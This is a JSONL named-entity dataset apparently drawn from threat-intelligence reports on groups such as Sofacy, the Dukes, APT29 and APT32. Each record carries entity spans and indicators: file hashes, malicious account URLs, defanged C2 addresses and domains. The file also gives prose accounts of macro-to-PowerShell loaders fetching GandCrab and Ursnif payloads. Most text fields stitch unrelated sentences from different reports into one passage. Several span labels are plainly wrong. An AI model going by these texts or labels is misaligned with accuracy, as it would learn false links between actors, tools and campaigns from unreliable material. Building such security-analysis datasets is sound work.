{"text": "] 975685 [ . Russian citizens\u2014journalists , software developers , politicians , researchers at universities , and artists are also targeted by Pawn Storm . Richard_Johnson.doc : 878e4e8677e68aba918d930f2cc67fbe 0a3f915dd071e862046949885043b3ba61100b946cbc0d84ef7c44d77a50f080 . Based on the files \u2019 thumbnail images \u2013 the only content visible in the Windows Explorer window \u2013 the PowerPoint files imitate Ukraine \u2019s Ministry of Defence and Poland \u2019s Ministry of National Defence .", "spans": [{"start": 21, "end": 41, "label": "Organization"}, {"start": 44, "end": 63, "label": "Organization"}, {"start": 66, "end": 77, "label": "Organization"}, {"start": 80, "end": 107, "label": "Organization"}, {"start": 114, "end": 121, "label": "Organization"}, {"start": 143, "end": 153, "label": "Organization"}, {"start": 156, "end": 175, "label": "Indicator"}, {"start": 178, "end": 210, "label": "Indicator"}, {"start": 211, "end": 275, "label": "Indicator"}, {"start": 322, "end": 396, "label": "Indicator"}, {"start": 405, "end": 435, "label": "Organization"}, {"start": 440, "end": 478, "label": "Organization"}]}
{"text": "] com Malicious Twitter accounts : https : //twitter.com/lucky88755 https : //twitter.com/lucky98745 https : //twitter.com/lucky876543 https : //twitter.com/luckyone1232 https : //twitter.com/sadwqewqeqw https : //twitter.com/gyugyu87418490 https : //twitter.com/fdgoer343 https : //twitter.com/sdfghuio342 https : //twitter.com/asdqweqweqeqw https : //twitter.com/ukenivor3 The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day ( CVE-2015-2590 ) in July 2015 . The document contained a VBS macro that once decompressed was approximately 650 lines of code . Bullock had spent many hours poring over the hundreds of thousands of emails that the Ashley Madison hackers stole from Biderman and published online in 2015 .", "spans": [{"start": 16, "end": 23, "label": "Organization"}, {"start": 35, "end": 67, "label": "Indicator"}, {"start": 68, "end": 100, "label": "Indicator"}, {"start": 101, "end": 134, "label": "Indicator"}, {"start": 135, "end": 169, "label": "Indicator"}, {"start": 170, "end": 203, "label": "Indicator"}, {"start": 204, "end": 240, "label": "Indicator"}, {"start": 241, "end": 272, "label": "Indicator"}, {"start": 273, "end": 306, "label": "Indicator"}, {"start": 307, "end": 342, "label": "Indicator"}, {"start": 343, "end": 374, "label": "Indicator"}, {"start": 379, "end": 387, "label": "System"}, {"start": 485, "end": 498, "label": "Vulnerability"}, {"start": 501, "end": 514, "label": "Vulnerability"}, {"start": 557, "end": 566, "label": "System"}, {"start": 628, "end": 635, "label": "Organization"}, {"start": 714, "end": 736, "label": "Organization"}, {"start": 748, "end": 756, "label": "Organization"}]}
{"text": "Malicious Instagram account : https : //www.instagram.com/freedomguidepeople1830/ Malicious Tumblr accounts : https : //mainsheetgyam.tumblr.com/ https : //hormonaljgrj.tumblr.com/ https : //globalanab.tumblr.com/ C & C addresses : 104 [ . While the JHUHUGIT ( and more recently , \" JKEYSKW \" ) implant used in most of the Sofacy attacks , high profile victims are being targeted with another first level implant , representing the latest evolution of their AZZY Trojan . The vast majority of that was junk code . Two days after the OT event , Sandworm deployed a new variant of CADDYWIPER in the victim \u2019s IT environment to cause further disruption and potentially to remove forensic artifacts .", "spans": [{"start": 10, "end": 19, "label": "Organization"}, {"start": 30, "end": 81, "label": "Indicator"}, {"start": 92, "end": 98, "label": "Organization"}, {"start": 110, "end": 145, "label": "Indicator"}, {"start": 146, "end": 180, "label": "Indicator"}, {"start": 181, "end": 213, "label": "Indicator"}, {"start": 232, "end": 239, "label": "Indicator"}, {"start": 250, "end": 258, "label": "System"}, {"start": 283, "end": 290, "label": "System"}, {"start": 458, "end": 469, "label": "System"}, {"start": 544, "end": 552, "label": "Organization"}, {"start": 579, "end": 589, "label": "Malware"}, {"start": 597, "end": 621, "label": "System"}]}
{"text": "] 160 [ . Once a foothold is established , Sofacy trys to upload more backdoors , USB stealers as well as other hacking tools such as \" Mimikatz \" for lateral movement . Once the junk code was removed from the VBScript , there are approximately 18 lines of relevant code , which ultimately call a shape box in the current document . This first step provides a SSRF equivalent to the technique used in ProxyNotShell exploitation .", "spans": [{"start": 43, "end": 49, "label": "Organization"}, {"start": 70, "end": 79, "label": "System"}, {"start": 82, "end": 94, "label": "System"}, {"start": 136, "end": 144, "label": "System"}, {"start": 210, "end": 218, "label": "System"}]}
{"text": "] 191 [ . Once a foothold is established , they try to upload more backdoors , USB stealers as well as other hacking tools such as \" Mimikatz \" for lateral movement . The variable names themselves are not relevant , however the methods in bold below will retrieve the AlternativeText field from the specified shape , which is then executed . The operation targeted individuals from three groups Senior thinktank personnel researching the Middle East , journalists focused on the region , and academics , including senior professors .", "spans": [{"start": 67, "end": 76, "label": "System"}, {"start": 79, "end": 91, "label": "System"}, {"start": 133, "end": 141, "label": "System"}, {"start": 268, "end": 283, "label": "System"}, {"start": 342, "end": 355, "label": "Organization"}, {"start": 395, "end": 449, "label": "Organization"}, {"start": 452, "end": 485, "label": "Organization"}, {"start": 488, "end": 531, "label": "Organization"}]}
{"text": "] 190:8822 61 [ . The Sofacy threat group continues to target government organizations in the EU , US , and former Soviet states to deliver the Zebrocy tool as a payload . The alternate text can easily be observed in the body of the office document . In each case , CrowdStrike reviewed the relevant logs and determined there was no evidence of exploitation of CVE-2022 - 41040 for initial access .", "spans": [{"start": 11, "end": 17, "label": "Indicator"}, {"start": 22, "end": 41, "label": "Organization"}, {"start": 62, "end": 86, "label": "Organization"}, {"start": 144, "end": 156, "label": "System"}, {"start": 266, "end": 277, "label": "Organization"}, {"start": 361, "end": 377, "label": "Vulnerability"}]}
{"text": "] 230 [ . Of note , we also discovered the Sofacy group using a very similar delivery document to deliver a new Trojan called Cannon . The area highlighted in blue is the shape name that is being located , while the text itself is highlighted in red . If you can not apply the KB5019758 patch immediately , you should disable OWA until the patch can be applied .", "spans": [{"start": 43, "end": 55, "label": "Organization"}, {"start": 112, "end": 118, "label": "System"}, {"start": 126, "end": 132, "label": "System"}]}
{"text": "] 204 [ . Komplex shares a significant amount of functionality and traits with another tool used by Sofacy \u2013 the Carberp variant that Sofacy had used in previous attack campaigns on systems running Windows . It is clear that the text is a base64 encoded command , that is then executed by the above VBScript . Mandiant has observed an increase in financially motivated operations by DPRK actors in the past year , particularly those focused on the cryptocurrency industry .", "spans": [{"start": 10, "end": 17, "label": "System"}, {"start": 100, "end": 106, "label": "Organization"}, {"start": 113, "end": 120, "label": "System"}, {"start": 134, "end": 140, "label": "Organization"}, {"start": 299, "end": 307, "label": "System"}, {"start": 383, "end": 394, "label": "Organization"}]}
{"text": "] 87:28833 61 [ . The Sofacy group created the Komplex Trojan to use in attack campaigns targeting the OS X operating system \u2013 a move that showcases their continued evolution toward multi-platform attacks . The PowerShell script will first create an instance of the .Net Webclient class and then enumerate the available methods using the GetMethods() call ( highlighted in the image in red ) . Considering that both Royal and BlackSuit were active last month , however , a rebrand probably is n\u2019t happening any time soon .", "spans": [{"start": 11, "end": 17, "label": "Indicator"}, {"start": 22, "end": 34, "label": "Organization"}, {"start": 47, "end": 61, "label": "System"}, {"start": 211, "end": 221, "label": "System"}, {"start": 266, "end": 270, "label": "Indicator"}, {"start": 338, "end": 350, "label": "System"}, {"start": 416, "end": 421, "label": "Malware"}, {"start": 426, "end": 435, "label": "Malware"}]}
{"text": "] 230 [ . The Komplex Trojan revealed a design similar to Sofacy 's Carberp variant Trojan , which we believe may have been done in order to handle compromised Windows and OS X systems using the same C2 server application with relative ease . The enumerated methods are stored , then a for loop looks first for the method named DownloadString ( highlighted in blue ) . NoEscape is a new ransomware which been doing the rounds in underground forums since May 2023 .", "spans": [{"start": 14, "end": 28, "label": "System"}, {"start": 58, "end": 64, "label": "Organization"}, {"start": 68, "end": 75, "label": "System"}, {"start": 328, "end": 342, "label": "System"}, {"start": 369, "end": 377, "label": "Malware"}]}
{"text": "] 204 [ . This whitepaper explores the tools - such as MiniDuke , CosmicDuke , OnionDuke , CozyDuke , etc- of the Dukes , a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making . If the DownloadString method is located it will contact the hard coded C2 requesting a file , which is downloaded and then invoked ( highlighted in blue ) . Another common delivery mechanism for ransomware attacks is via phishing emails , compounding the problem for security teams already overburdened with managing an evergrowing volume of suspicious messages that require review .", "spans": [{"start": 55, "end": 63, "label": "System"}, {"start": 66, "end": 76, "label": "System"}, {"start": 79, "end": 88, "label": "System"}, {"start": 91, "end": 99, "label": "System"}, {"start": 114, "end": 119, "label": "Organization"}, {"start": 172, "end": 192, "label": "Organization"}, {"start": 364, "end": 378, "label": "System"}, {"start": 428, "end": 430, "label": "System"}]}
{"text": "] 87:28844 61 [ . The Dukes are a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making . It should be noted that because the requested resource is being stored as a string and executed , this all occurs in memory . Check that there is more than 5 GB of disk space on the NetScaler device available ( instructions from vendor ) .", "spans": [{"start": 11, "end": 17, "label": "Indicator"}, {"start": 22, "end": 27, "label": "Organization"}, {"start": 82, "end": 102, "label": "Organization"}]}
{"text": "] 230 [ . The Dukes are known to employ a vast arsenal of malware toolsets , which we identify as MiniDuke , CosmicDuke , OnionDuke , CozyDuke , CloudDuke , SeaDuke , HammerDuke , PinchDuke , and GeminiDuke . Additional Analysis of the downloaded string is provided in the Gandcrab cradle section below . The \u201c -do \u201d flag specifies a SCIL program file to execute ( Figure 8) .", "spans": [{"start": 14, "end": 19, "label": "Organization"}, {"start": 98, "end": 106, "label": "System"}, {"start": 109, "end": 119, "label": "System"}, {"start": 122, "end": 131, "label": "System"}, {"start": 134, "end": 142, "label": "System"}, {"start": 145, "end": 154, "label": "System"}, {"start": 157, "end": 164, "label": "System"}, {"start": 167, "end": 177, "label": "System"}, {"start": 180, "end": 189, "label": "System"}, {"start": 196, "end": 206, "label": "System"}, {"start": 273, "end": 281, "label": "Malware"}, {"start": 305, "end": 362, "label": "Malware"}]}
{"text": "] 204 [ . The origins of the Duke toolset names can be traced back to when researchers at Kaspersky Labs coined the term \" MiniDuke \" to identify the first Duke-related malware they found . The loop then looks for the method name DownloadData , and if located will download a resource from a second C2 . On July 15th , Facebook revealed it tracked and partially disrupted a longrunning Iranian attack campaign that used accounts to pose as recruiters and draw in US targets before sending them malwareinfected files or tricking them into entering sensitive credentials to phishing sites .", "spans": [{"start": 90, "end": 104, "label": "Organization"}, {"start": 123, "end": 131, "label": "System"}, {"start": 156, "end": 176, "label": "System"}, {"start": 230, "end": 242, "label": "System"}, {"start": 299, "end": 301, "label": "System"}, {"start": 319, "end": 327, "label": "Organization"}, {"start": 374, "end": 409, "label": "Organization"}]}
{"text": "] 87:28855 61 [ . As researchers continued discovering new toolsets that were created and used by the same group that had been operating MiniDuke , and thus the threat actor operating the toolsets started to be commonly referred to as \" Dukes \" . This request is then stored in the CommonApplicationData directory ( C:\\ProgramData in Vista and later ) as the hard coded file name ( highlighted in green ) . The use of 3AM was only partially successful .", "spans": [{"start": 11, "end": 17, "label": "Indicator"}, {"start": 107, "end": 112, "label": "Organization"}, {"start": 137, "end": 145, "label": "System"}, {"start": 161, "end": 173, "label": "Organization"}, {"start": 237, "end": 242, "label": "Organization"}, {"start": 418, "end": 421, "label": "Malware"}]}
{"text": "] 230 [ . Based on the campaign identifiers found in PinchDuke samples discovered from 2009 , the targets of the Dukes group during that year included organizations such as the Ministry of Defense of Georgia and the ministries of foreign affairs of Turkey and Uganda . The script will utilize the hard coded DCOM object C08AFD90-F2A1-11D1-8455-00A0C91F3880 , which is the ClassID for the ShellBrowserWindow . Although we have not identified sufficient evidence to determine the origin or purpose of COSMICENERGY , we believe that the malware was possibly developed by either Rostelecom - Solar or an associated party to recreate real attack scenarios against energy grid assets .", "spans": [{"start": 53, "end": 70, "label": "System"}, {"start": 113, "end": 124, "label": "Organization"}, {"start": 177, "end": 196, "label": "Organization"}, {"start": 216, "end": 245, "label": "Organization"}, {"start": 308, "end": 312, "label": "System"}, {"start": 388, "end": 406, "label": "System"}, {"start": 499, "end": 511, "label": "Malware"}]}
{"text": "] 205 [ . Importantly , PinchDuke trojan samples always contain a notable text string , which we believe is used as a campaign identifier by the Dukes group to distinguish between multiple attack campaigns that are run in parallel . A previous blog post by enigma0x3 , detailed how this CLSID can be leveraged to instantiate the ShellBrowserWindow object and call the ShellExecute method , which is the same approach that was taken by the attackers . An adversary could potentially instruct a control systems device to perform an action that will cause an Impact", "spans": [{"start": 24, "end": 48, "label": "System"}, {"start": 145, "end": 156, "label": "Organization"}, {"start": 329, "end": 347, "label": "System"}, {"start": 368, "end": 380, "label": "System"}, {"start": 451, "end": 562, "label": "Vulnerability"}]}
{"text": "] 122:28833 61 [ . This neatly ties together many of the tools used by the Dukes group , as versions of this one loader have been used to load malware from three different Dukes-related toolsets CosmicDuke , PinchDuke , and MiniDuke \u2013 over the course of five years . This approach has also been used in different Empire modules . The July 2023 campaign has a slightly modified infection chain .", "spans": [{"start": 12, "end": 18, "label": "Indicator"}, {"start": 75, "end": 86, "label": "Organization"}, {"start": 195, "end": 205, "label": "System"}, {"start": 208, "end": 217, "label": "System"}, {"start": 224, "end": 232, "label": "System"}, {"start": 313, "end": 319, "label": "System"}, {"start": 344, "end": 352, "label": "Organization"}]}
{"text": "] 230 [ . The Dukes continued the expansion of their arsenal in 2011 with the addition of two more toolsets : MiniDuke and CozyDuke . The payloads that are downloaded in the above steps are then executed on the system . While a threat actor can choose only to access a single account from a single source IP address , Mandiant has observed that multiple accounts were accessed within hours from the same source IP address by a threat actor .", "spans": [{"start": 14, "end": 19, "label": "Organization"}, {"start": 110, "end": 118, "label": "System"}, {"start": 123, "end": 131, "label": "System"}, {"start": 345, "end": 439, "label": "Indicator"}]}
{"text": "] 205 [ . As we now know , by February 2013 the Dukes group had been operating MiniDuke and other toolsets for at least 4 and a half years . The first payload that is downloaded via the DownloadString method highlighted above , is a PowerShell one-liner that uses an IF statement to evaluate the architecture of the compromised system , and then downloads a additional payload from pastebin.com . In the case of the exploit method described here as OWASSRF , the endpoint is not used , in lieu , and the request will not be dropped .", "spans": [{"start": 48, "end": 59, "label": "Organization"}, {"start": 79, "end": 87, "label": "System"}, {"start": 186, "end": 200, "label": "System"}, {"start": 233, "end": 243, "label": "System"}, {"start": 382, "end": 394, "label": "Indicator"}]}
{"text": "] 122:28844 61 [ . Secondly , the value the Dukes intended to gain from these MiniDuke campaigns may have been so great that they deemed it worth the risk of getting noticed . This additional payload is then executed in memory . Cisco Secure Malware Analytics ( Threat Grid ) identifies malicious binaries and builds protection into all Cisco Secure products .", "spans": [{"start": 12, "end": 18, "label": "Indicator"}, {"start": 44, "end": 49, "label": "Organization"}, {"start": 229, "end": 259, "label": "System"}, {"start": 262, "end": 273, "label": "System"}]}
{"text": "] 230 [ . This is in stark contrast to some other suspected Russian threat actors ( such as Operation Pawn Storm ) who appear to have increased their targeting of Ukraine following the crisis . The image below depicts the contents of the o402ek2m.php file . The Systemd configuration file leveraged by Sandworm enabled the group to maintain persistence on systems .", "spans": [{"start": 68, "end": 81, "label": "Organization"}, {"start": 238, "end": 250, "label": "Indicator"}, {"start": 302, "end": 310, "label": "Organization"}]}
{"text": "] 205 [ . The Dukes actively targeted Ukraine before the crisis , at a time when Russia was still weighing her options , but once Russia moved from diplomacy to direct action , Ukraine was no longer relevant to the Dukes in the same way . It should be noted that the contents of o402ek2m.php were updated by the attackers to reference different pastebin uploads throughout this campaign . JumpCloud confirmed the commands framework was used for malicious data injections in their security incident disclosure .", "spans": [{"start": 14, "end": 19, "label": "Organization"}, {"start": 215, "end": 220, "label": "Organization"}, {"start": 279, "end": 291, "label": "Indicator"}]}
{"text": "] 122:28855 61 [ . In the latter case however , the Dukes group appear to have also simultaneously developed an entirely new loader , which we first observed being used in conjunction with CosmicDuke during the spring of 2015 . Also updated was the function name that is invoked , in the example below it was CJOJFNUWNQKRTLLTMCVDCKFGG , however this was dynamically changed to match the name of the function that would be present in pastebin file that was being downloaded . Evidence of malicious intent can come in many forms , here are just a few potential IoAs", "spans": [{"start": 12, "end": 18, "label": "Indicator"}, {"start": 52, "end": 63, "label": "Organization"}, {"start": 189, "end": 199, "label": "System"}, {"start": 475, "end": 503, "label": "Indicator"}, {"start": 559, "end": 563, "label": "Indicator"}]}
{"text": "] 230 [ . The Dukes could have ceased all use of CosmicDuke ( at least until they had developed a new loader ) or retired it entirely , since they still had other toolsets available . Once the raw contents of the pastebin.com post were downloaded , that data would also be executed in memory . \" Iran often adopts an asymmetric warfare strategy to accomplish its political and military goals , and its development of cyberwarfare capabilities adds to this asymmetric toolkit , allowing the country a lowcost means to conduct espionage and attack stronger adversaries .", "spans": [{"start": 14, "end": 19, "label": "Organization"}, {"start": 49, "end": 59, "label": "System"}, {"start": 213, "end": 225, "label": "Indicator"}, {"start": 296, "end": 300, "label": "Organization"}]}
{"text": "] 205 [ . For these CozyDuke campaigns however , the Dukes appear to have employed two particular later-stage toolsets , SeaDuke and HammerDuke . In the variants that were obtained during this campaign the file contained a PowerShell script that was approximately 2800 lines . The popularity of social network and media platforms remain on the rise , and we expect cybercriminals to be naturally drawn towards exploiting them however they can .", "spans": [{"start": 53, "end": 58, "label": "Organization"}, {"start": 121, "end": 128, "label": "System"}, {"start": 133, "end": 143, "label": "System"}, {"start": 223, "end": 233, "label": "System"}, {"start": 295, "end": 329, "label": "System"}, {"start": 365, "end": 379, "label": "Organization"}]}
{"text": "] 132:28833 61 [ . Firstly , as with the MiniDuke campaigns of February 2013 and CosmicDuke campaigns in the summer of 2014 , again the group clearly prioritized the continuation of their operations over maintaining stealth . This PowerShell script is a version of the Empire Invoke-PSInject module , with very few modifications . Figure 1 : URL vulnerable to CVE-2023 - 4966 https://<Gateway or ADC IP address>/oauth / idp/.well - known / openid - configuration", "spans": [{"start": 12, "end": 18, "label": "Indicator"}, {"start": 136, "end": 141, "label": "Organization"}, {"start": 231, "end": 241, "label": "System"}, {"start": 269, "end": 291, "label": "System"}, {"start": 360, "end": 375, "label": "Vulnerability"}]}
{"text": "] 230 [ . In addition to the notably overt and large-scale campaigns with CozyDuke and CloudDuke , the Dukes also continued to engage in more covert , surgical campaigns using CosmicDuke . The majority if the modifications are of removing comments and renaming variables . In fact , we saw instances of compromised stores having both skimmers loaded , which means double trouble for victims as their credit card information is stolen not just once but twice .", "spans": [{"start": 103, "end": 108, "label": "Organization"}, {"start": 176, "end": 186, "label": "System"}, {"start": 290, "end": 349, "label": "Indicator"}]}
{"text": "] 205 [ . We are however only aware of one instance - the exploitation of CVE-2013-0640 to deploy MiniDuke - where we believe the exploited vulnerability was a zero-day at the time that the group acquired the exploit . The script will take an embedded PE file that has been base64 encoded and inject that into the current PowerShell process . Mandiant identified UNC4899 targeting MacOS keychains and reconnaissance data associated with executives and internal security teams .", "spans": [{"start": 74, "end": 87, "label": "Vulnerability"}, {"start": 98, "end": 106, "label": "System"}, {"start": 160, "end": 168, "label": "Vulnerability"}, {"start": 190, "end": 195, "label": "Organization"}, {"start": 252, "end": 254, "label": "System"}, {"start": 322, "end": 332, "label": "System"}, {"start": 381, "end": 396, "label": "Organization"}, {"start": 401, "end": 475, "label": "Organization"}]}
{"text": "] 132:28844 61 [ . All of the available evidence however does in our opinion suggest that the group operates on behalf of the Russian Federation . The image below is the main function that is being called which in turns calls the function responsible for injecting the embedded PE file . This rule was designed to match the decoded URI of any incoming request with the regex , so when the decoded URI matches this regex , the request is dropped .", "spans": [{"start": 12, "end": 18, "label": "Indicator"}, {"start": 94, "end": 99, "label": "Organization"}, {"start": 269, "end": 285, "label": "System"}]}
{"text": "] 230 [ . This assertion of time zone is also supported by timestamps found in many GeminiDuke samples , which similarly suggest the group work in the Moscow Standard Time timezone , as further detailed in the section on the technical analysis of GeminiDuke . The base64 encoded PE file that can be seen in line 2760 of the image above is a GandCrab Variant . Charming Kitten members , claiming to be a senior teaching and research fellow at SOAS university in London sent targeted emails to a select number of victims from fewer than 10 organizations in the US and UK , inviting them to an online conference called The US Security Challenges in the Middle East .", "spans": [{"start": 84, "end": 102, "label": "System"}, {"start": 133, "end": 138, "label": "Organization"}, {"start": 247, "end": 257, "label": "System"}, {"start": 279, "end": 281, "label": "System"}, {"start": 341, "end": 349, "label": "Malware"}, {"start": 360, "end": 375, "label": "Organization"}]}
{"text": "] 205 [ . Mandiant has observed Russian nation-state attackers APT29 employing domain fronting techniques for stealthy backdoor access to victim environments for at least two years . This variant ( the metadata for which is listed below ) is Gandcrab version . Cisco , Microsoft , and other tech companies have joined in supporting Meta 's lawsuit against the NSO Group referenced above through court filings .", "spans": [{"start": 10, "end": 18, "label": "Organization"}, {"start": 53, "end": 62, "label": "Organization"}, {"start": 63, "end": 68, "label": "Organization"}, {"start": 242, "end": 250, "label": "Malware"}, {"start": 261, "end": 266, "label": "Organization"}, {"start": 269, "end": 278, "label": "Organization"}, {"start": 332, "end": 347, "label": "Organization"}, {"start": 360, "end": 369, "label": "Organization"}]}
{"text": "] 132:28855 GoldenCup : New Cyber Threat Targeting World Cup Fans As the World Cup launches , so does a new threat Officials from the Israeli Defense Force recently uncovered an Android Spyware campaign targeting Israeli soldiers and orchestrated by \" Hamas . APT29 has used The Onion Router and the TOR domain fronting plugin meek to create a hidden , encrypted network tunnel that appeared to connect to Google services over TLS . krab5.dll : 0f270db9ab9361e20058b8c6129bf30e d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525 , Mon Oct 29 17:39:23 2018 UTC . krab5.text : 019bc7edf8c2896754fdbdbc2ddae4ec . krab5.rdata : d6ed79624f7af19ba90f51379b7f31e4 . krab5.data : 1ec7b57b01d0c46b628a991555fc90f0 . krab5.rsrc : 89b7e19270b2a5563c301b84b28e423f . krab5.reloc : 685c3c775f65bffceccc1598ff7c2e59 . passing this wide string to function with only one string This could lead to unexpected behavior it could raise access violation exception or just continue and only the first placeholder replaced .", "spans": [{"start": 12, "end": 21, "label": "Malware"}, {"start": 134, "end": 155, "label": "Organization"}, {"start": 178, "end": 185, "label": "System"}, {"start": 252, "end": 257, "label": "Organization"}, {"start": 260, "end": 265, "label": "Organization"}, {"start": 275, "end": 291, "label": "System"}, {"start": 300, "end": 331, "label": "System"}, {"start": 406, "end": 412, "label": "Organization"}, {"start": 433, "end": 442, "label": "Indicator"}, {"start": 445, "end": 477, "label": "Indicator"}, {"start": 478, "end": 542, "label": "Indicator"}, {"start": 576, "end": 586, "label": "Indicator"}, {"start": 589, "end": 621, "label": "Indicator"}, {"start": 624, "end": 635, "label": "Indicator"}, {"start": 638, "end": 670, "label": "Indicator"}, {"start": 673, "end": 683, "label": "Indicator"}, {"start": 686, "end": 718, "label": "Indicator"}, {"start": 721, "end": 731, "label": "Indicator"}, {"start": 734, "end": 766, "label": "Indicator"}, {"start": 769, "end": 780, "label": "Indicator"}, {"start": 783, "end": 815, "label": "Indicator"}, {"start": 818, "end": 875, "label": "Malware"}]}
{"text": "'' The latest samples attributed to this campaign were discovered by security researchers from ClearSky . Mandiant has observed APT29 using a stealthy backdoor that we call POSHSPY . The second payload , downloaded via the DownloadData method , is a Ursnif executable . Additional investigation will reveal more about the goals of Charming Kitten regarding the medical sector .", "spans": [{"start": 95, "end": 103, "label": "Organization"}, {"start": 106, "end": 114, "label": "Organization"}, {"start": 128, "end": 133, "label": "Organization"}, {"start": 173, "end": 180, "label": "System"}, {"start": 223, "end": 235, "label": "System"}, {"start": 250, "end": 256, "label": "Malware"}, {"start": 331, "end": 346, "label": "Organization"}, {"start": 361, "end": 375, "label": "Organization"}]}
{"text": "In our research , we focus on the most recent sample , an application dubbed as \" Golden Cup '' , launched just before the start of World Cup 2018 . Mandiant has since identified POSHSPY in several other environments compromised by APT29 over the past two years . In this instance it is saved to the C:\\ProgramData directory with a pseudo random name . While one of his signatures uses his own blog domain , there is also a second signature which uses 93[.]gd , a domain that was found to have been actively selling VPS services in the past .", "spans": [{"start": 82, "end": 92, "label": "Malware"}, {"start": 149, "end": 157, "label": "Organization"}, {"start": 179, "end": 186, "label": "System"}, {"start": 232, "end": 237, "label": "Organization"}, {"start": 452, "end": 540, "label": "Indicator"}]}
{"text": "Distribution / Infection When this campaign started at the start of 2018 , the malware ( \" GlanceLove '' , \" WinkChat '' ) was distributed by the perpetrators mainly via fake Facebook profiles , attempting to seduce IDF soldiers to socialize on a different platform ( their malware ) . In the investigations Mandiant has conducted , it appeared that APT29 deployed POSHSPY as a secondary backdoor for use if they lost access to their primary backdoors . It should be noted that the file name was changed throughout this campaign . The attacks reportedly use social engineering to create Trojan email campaigns customdesigned for their victims , the article stated .", "spans": [{"start": 91, "end": 101, "label": "Malware"}, {"start": 109, "end": 117, "label": "Malware"}, {"start": 175, "end": 183, "label": "System"}, {"start": 308, "end": 316, "label": "Organization"}, {"start": 350, "end": 355, "label": "Organization"}, {"start": 365, "end": 372, "label": "System"}]}
{"text": "As this approach was not a great success , their last attempt was to quickly create a World Cup app and this time distribute it to Israeli citizens , not just soldiers . POSHSPY is an excellent example of the skill and craftiness of APT29 . Once executed the Ursnif sample will conduct the typical actions observed in Ursnif samples , like credential harvesting , gathering system and process information , and deploying additional malware samples . Other big stories in June include a suspected LockBit affiliate arrest , the Royal ransomware gang toying with a new encryptor , and a notable increase in attacks on the Manufacturing sector .", "spans": [{"start": 170, "end": 177, "label": "System"}, {"start": 233, "end": 238, "label": "Organization"}, {"start": 259, "end": 265, "label": "Malware"}, {"start": 318, "end": 324, "label": "Malware"}, {"start": 496, "end": 503, "label": "Organization"}, {"start": 527, "end": 548, "label": "Organization"}, {"start": 563, "end": 576, "label": "System"}, {"start": 620, "end": 640, "label": "Organization"}]}
{"text": "The official \u201c Golden Cup \u201d Facebook page . FireEye assesses that APT32 leverages a unique suite of fully-featured malware , in conjunction with commercially-available tools , to conduct targeted operations that are aligned with Vietnamese state interests . The information for this specific sample is listed below . Talos researchers recently discovered multiple vulnerabilities in Open Babel , an open - source software library used in a variety of chemistry and research settings .", "spans": [{"start": 15, "end": 25, "label": "Malware"}, {"start": 28, "end": 36, "label": "System"}, {"start": 44, "end": 51, "label": "Organization"}, {"start": 66, "end": 71, "label": "Organization"}, {"start": 317, "end": 334, "label": "Organization"}, {"start": 383, "end": 393, "label": "System"}]}
{"text": "The short URL redirects to the application page at Google Play . In addition to focused targeting of the private sector with ties to Vietnam , APT32 has also targeted foreign governments , as well as Vietnamese dissidents and journalists since at least 2013 . However , numerous Ursnif variants were hosted on the bevendbrec.com site during this campaign . Now , consider a cyber threat detection system that takes a comprehensive and holistic approach to analyzing user behavior and computing interactions .", "spans": [{"start": 51, "end": 62, "label": "System"}, {"start": 143, "end": 148, "label": "Organization"}, {"start": 175, "end": 186, "label": "Organization"}, {"start": 211, "end": 221, "label": "Organization"}, {"start": 226, "end": 237, "label": "Organization"}, {"start": 279, "end": 285, "label": "Malware"}, {"start": 314, "end": 328, "label": "Indicator"}]}
{"text": "The official \u201c Golden Cup \u201d Facebook page . From 2016 through 2017 , two subsidiaries of U.S. and Philippine consumer products corporations , located inside Vietnam , were the target of APT32 intrusion operations . Carbon Black was able to discover approximately 120 different Ursnif variants that were being hosted from the domains iscondisth.com and bevendbrec.com . irongreen.exe : 404d25e3a18bda19a238f77270837198 c064f6f047a4e39014a29c8c95526c3fe90d7bcea5ef0b8f21ea306c27713d1f , Sun Dec 18 11:04:31 2011 UTC . irongreen.text : 85aa9117c381eae3d181ab63daab335e . irongreen.rdata : 3e1c774bc4e0ffc2271075e621aa3f3d . irongreen.data : 6c389e5e301564f65dcad4811dbded8b . irongreen.rsrc : efba623cc62ffd0ccbf7f3fbf6264905 . irongreen.reloc : 6cf46599a57a6cbc5d18fbb2883620ce . The fact that this activity occurred as recently as August 2023 suggests that the group is currently active , and that those organizations that may be of interest to Budworm should be aware of this activity and the groups current toolset .", "spans": [{"start": 15, "end": 25, "label": "Malware"}, {"start": 28, "end": 36, "label": "System"}, {"start": 109, "end": 139, "label": "Organization"}, {"start": 186, "end": 191, "label": "Organization"}, {"start": 215, "end": 227, "label": "Organization"}, {"start": 277, "end": 283, "label": "Malware"}, {"start": 333, "end": 347, "label": "Indicator"}, {"start": 352, "end": 366, "label": "Indicator"}, {"start": 369, "end": 382, "label": "Indicator"}, {"start": 385, "end": 417, "label": "Indicator"}, {"start": 418, "end": 482, "label": "Indicator"}, {"start": 516, "end": 530, "label": "Indicator"}, {"start": 533, "end": 565, "label": "Indicator"}, {"start": 568, "end": 583, "label": "Indicator"}, {"start": 586, "end": 618, "label": "Indicator"}, {"start": 621, "end": 635, "label": "Indicator"}, {"start": 638, "end": 670, "label": "Indicator"}, {"start": 673, "end": 687, "label": "Indicator"}, {"start": 690, "end": 722, "label": "Indicator"}, {"start": 725, "end": 740, "label": "Indicator"}, {"start": 743, "end": 775, "label": "Indicator"}, {"start": 856, "end": 859, "label": "Organization"}, {"start": 903, "end": 916, "label": "Organization"}, {"start": 944, "end": 951, "label": "Organization"}, {"start": 993, "end": 999, "label": "Organization"}]}
{"text": "The short URL redirects to the application page at Google Play . From 2016 through 2017 , two consumer products corporations , located inside Vietnam , were the target of APT32 intrusion operations . While researching this campaign approximately 180 variants were located in the wild . As MuddyWater is assessed to be primarily focused on cyberespionage , it is very likely that data theft is the primary objective behind the Earth Vetala campaign .", "spans": [{"start": 51, "end": 62, "label": "System"}, {"start": 94, "end": 124, "label": "Organization"}, {"start": 171, "end": 176, "label": "Organization"}, {"start": 289, "end": 299, "label": "Organization"}, {"start": 426, "end": 447, "label": "Organization"}]}
